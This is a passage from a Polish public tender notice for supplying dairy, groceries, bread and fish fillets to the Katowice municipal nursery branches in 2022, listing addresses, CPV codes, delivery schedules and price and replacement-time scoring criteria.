SWZ)”, dokonana zostanie na podsta-wie czasu wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>Ocena ofert w oparciu o kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )” klasyfikuje się nastę-pująco:<br/>1) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 1,5 godziny od momentu zgłoszenia 40 pkt;<br/>2) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 2 godzin od momentu zgłoszenia - 30 pkt;<br/>3) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ)- do 3 godzin od momentu zgłoszenia - 20pkt;<br/>4) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) – do 4 godzin od momentu zgłoszenia - 10 pkt;<br/>5) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) - do 5 godzin od momentu zgłoszenia -0 pkt.<br/>Ocena ofert w oparciu o kryterium czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ ) rozpatrywana będzie na podsta-wie zadeklarowanego przez Wykonawcę w Formularzu Oferty j/w.<br/>Najkrótszy możliwy czas wymiany towaru na wolny od wad to 1,5 godziny od momentu zgłoszenia.<br/>Najdłuższy możliwy czas wymiany towaru na wolny od wad to 5 godzin od momentu zgłoszenia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4	Dostawa artykułów nabiałowych<br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/>Częstotliwość dostaw:<br/>Dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdego Oddziału Żłobka na podstawie tzw. zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12:00. <br/>Zamawiający przewiduje możliwość składania zamówień pilnych, w szczególnych przypadkach wynikających z potrzeb Zamawiającego, które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Czas oczekiwania do max 2 godzin od momentu telefonicznego lub ( mejlowego) zgłoszenia za-mówienia. <br/>Definicja dnia roboczego – dzień od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy na terenie Rzeczpospolitej Polskiej.<br/>HARMONOGRAM DOSTAW ŻYWNOŚCI DO ODDZIAŁÓW<br/>ŻŁOBKA MIEJSKIEGO W KATOWICACH<br/><br/>•	ZADANIE I – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 - 7.30<br/>•	ZADANIE III – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 10:00<br/>•	ZADANIE IV – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 8.30<br/>•	ZADANIE V – ŚRODA 6.00 – 10.00<br/>•	ZADANIE VI – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 7.30<br/>•	ZADANIE VII- WTOREK, PIĄTEK 6.00 – 7.30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <p class="mb-0">15511100-4 - Mleko pasteryzowane</p> <p class="mb-0">15530000-2 - Masło</p> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <p class="mb-0">15542100-0 - Ser twarogowy</p> <p class="mb-0">15551300-8 - Jogurt</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz czasowym tj. z uwzględnieniem czasu wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Za najkorzystniejszą zostanie uznana oferta z najniższą ceną, najkrótszym czasem wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru wzoru w SWZ.<br/>Ocena punktowa w kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ)”, dokonana zostanie na podsta-wie czasu wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>Ocena ofert w oparciu o kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )” klasyfikuje się nastę-pująco:<br/>1) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 1,5 godziny od momentu zgłoszenia 40 pkt;<br/>2) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 2 godzin od momentu zgłoszenia - 30 pkt;<br/>3) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ)- do 3 godzin od momentu zgłoszenia - 20pkt;<br/>4) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) – do 4 godzin od momentu zgłoszenia - 10 pkt;<br/>5) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) - do 5 godzin od momentu zgłoszenia -0 pkt.<br/>Ocena ofert w oparciu o kryterium czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ ) rozpatrywana będzie na podsta-wie zadeklarowanego przez Wykonawcę w Formularzu Oferty j/w.<br/>Najkrótszy możliwy czas wymiany towaru na wolny od wad to 1,5 godziny od momentu zgłoszenia.<br/>Najdłuższy możliwy czas wymiany towaru na wolny od wad to 5 godzin od momentu zgłoszenia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5	Dostawa różnych artykułów spożywczych<br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/>Częstotliwość dostaw:<br/>Dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdego Oddziału Żłobka na podstawie tzw. zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12:00. <br/>Zamawiający przewiduje możliwość składania zamówień pilnych, w szczególnych przypadkach wynikających z potrzeb Zamawiającego, które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Czas oczekiwania do max 2 godzin od momentu telefonicznego lub ( mejlowego) zgłoszenia za-mówienia. <br/>Definicja dnia roboczego – dzień od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy na terenie Rzeczpospolitej Polskiej.<br/>HARMONOGRAM DOSTAW ŻYWNOŚCI DO ODDZIAŁÓW<br/>ŻŁOBKA MIEJSKIEGO W KATOWICACH<br/><br/>•	ZADANIE I – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 - 7.30<br/>•	ZADANIE III – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 10:00<br/>•	ZADANIE IV – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 8.30<br/>•	ZADANIE V – ŚRODA 6.00 – 10.00<br/>•	ZADANIE VI – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 7.30<br/>•	ZADANIE VII- WTOREK, PIĄTEK 6.00 – 7.30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">15820000-2 - Sucharki i herbatniki; wyroby piekarskie i ciastkarskie o przedłużonej trwałości</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15831600-8 - Miód</p> <p class="mb-0">15850000-1 - Produkty z ciasta makaronowego</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15880000-0 - Specjalne produkty odżywcze</p> <p class="mb-0">15898000-9 - Drożdże</p> <p class="mb-0">15899000-6 - Proszek do pieczenia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz czasowym tj. z uwzględnieniem czasu wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Za najkorzystniejszą zostanie uznana oferta z najniższą ceną, najkrótszym czasem wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru wzoru w SWZ.<br/>Ocena punktowa w kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ)”, dokonana zostanie na podsta-wie czasu wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>Ocena ofert w oparciu o kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )” klasyfikuje się nastę-pująco:<br/>1) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 1,5 godziny od momentu zgłoszenia 40 pkt;<br/>2) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 2 godzin od momentu zgłoszenia - 30 pkt;<br/>3) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ)- do 3 godzin od momentu zgłoszenia - 20pkt;<br/>4) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) – do 4 godzin od momentu zgłoszenia - 10 pkt;<br/>5) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) - do 5 godzin od momentu zgłoszenia -0 pkt.<br/>Ocena ofert w oparciu o kryterium czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ ) rozpatrywana będzie na podsta-wie zadeklarowanego przez Wykonawcę w Formularzu Oferty j/w.<br/>Najkrótszy możliwy czas wymiany towaru na wolny od wad to 1,5 godziny od momentu zgłoszenia.<br/>Najdłuższy możliwy czas wymiany towaru na wolny od wad to 5 godzin od momentu zgłoszenia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 6 Dostawa pieczywa <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/>Częstotliwość dostaw:<br/>Dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdego Oddziału Żłobka na podstawie tzw. zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12:00. <br/>Zamawiający przewiduje możliwość składania zamówień pilnych, w szczególnych przypadkach wynikających z potrzeb Zamawiającego, które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Czas oczekiwania do max 2 godzin od momentu telefonicznego lub ( mejlowego) zgłoszenia za-mówienia. <br/>Definicja dnia roboczego – dzień od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy na terenie Rzeczpospolitej Polskiej.<br/>HARMONOGRAM DOSTAW ŻYWNOŚCI DO ODDZIAŁÓW<br/>ŻŁOBKA MIEJSKIEGO W KATOWICACH<br/><br/>•	ZADANIE I – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 - 7.30<br/>•	ZADANIE III – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 10:00<br/>•	ZADANIE IV – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 8.30<br/>•	ZADANIE V – ŚRODA 6.00 – 10.00<br/>•	ZADANIE VI – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 7.30<br/>•	ZADANIE VII- WTOREK, PIĄTEK 6.00 – 7.30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15811000-6 - Pieczywo</p> <p class="mb-0">15811100-7 - Chleb</p> <p class="mb-0">15811400-0 - Bułeczki</p> <p class="mb-0">15893000-4 - Produkty suszone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz czasowym tj. z uwzględnieniem czasu wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Za najkorzystniejszą zostanie uznana oferta z najniższą ceną, najkrótszym czasem wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru wzoru w SWZ.<br/>Ocena punktowa w kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ)”, dokonana zostanie na podsta-wie czasu wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>Ocena ofert w oparciu o kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )” klasyfikuje się nastę-pująco:<br/>1) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 1,5 godziny od momentu zgłoszenia 40 pkt;<br/>2) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 2 godzin od momentu zgłoszenia - 30 pkt;<br/>3) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ)- do 3 godzin od momentu zgłoszenia - 20pkt;<br/>4) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) – do 4 godzin od momentu zgłoszenia - 10 pkt;<br/>5) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamó-wieniem (niezgodności ilościowe, jakościowe czy z SWZ) - do 5 godzin od momentu zgłoszenia -0 pkt.<br/>Ocena ofert w oparciu o kryterium czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ ) rozpatrywana będzie na podsta-wie zadeklarowanego przez Wykonawcę w Formularzu Oferty j/w.<br/>Najkrótszy możliwy czas wymiany towaru na wolny od wad to 1,5 godziny od momentu zgłoszenia.<br/>Najdłuższy możliwy czas wymiany towaru na wolny od wad to 5 godzin od momentu zgłoszenia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 7 Dostawa świeżych filetów rybnych<br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/>Częstotliwość dostaw:<br/>Dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdego Oddziału Żłobka na podstawie tzw. zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12:00. <br/>Zamawiający przewiduje możliwość składania zamówień pilnych, w szczególnych przypadkach wynikających z potrzeb Zamawiającego, które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Czas oczekiwania do max 2 godzin od momentu telefonicznego lub ( mejlowego) zgłoszenia za-mówienia. <br/>Definicja dnia roboczego – dzień od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy na terenie Rzeczpospolitej Polskiej.<br/>HARMONOGRAM DOSTAW ŻYWNOŚCI DO ODDZIAŁÓW<br/>ŻŁOBKA MIEJSKIEGO W KATOWICACH<br/><br/>•	ZADANIE I – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 - 7.30<br/>•	ZADANIE III – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 10:00<br/>•	ZADANIE IV – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 8.30<br/>•	ZADANIE V – ŚRODA 6.00 – 10.00<br/>•	ZADANIE VI – PONIEDZIAŁEK, ŚRODA, PIĄTEK 6.00 – 7.30<br/>•	ZADANIE VII- WTOREK, PIĄTEK 6.00 – 7.30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15211100-1 - Świeże filety rybne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz czasowym tj. z uwzględnieniem czasu wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Za najkorzystniejszą zostanie uznana oferta z najniższą ceną, najkrótszym czasem wymiany towaru na wolny od wad, w przypadku dostarczenia artykułów niezgodnych z zamówieniem ilościowym , jakościowym lub z SWZ.Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru wzoru w SWZ.<br/>Ocena punktowa w kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ)”, dokonana zostanie na podstawie czasu wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli powyżej.<br/>Ocena ofert w oparciu o kryterium „Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )” klasyfikuje się następująco:<br/>1) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 1,5 godziny od momentu zgłoszenia 40 pkt;<br/>2) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )- do 2 godzin od momentu zgłoszenia - 30 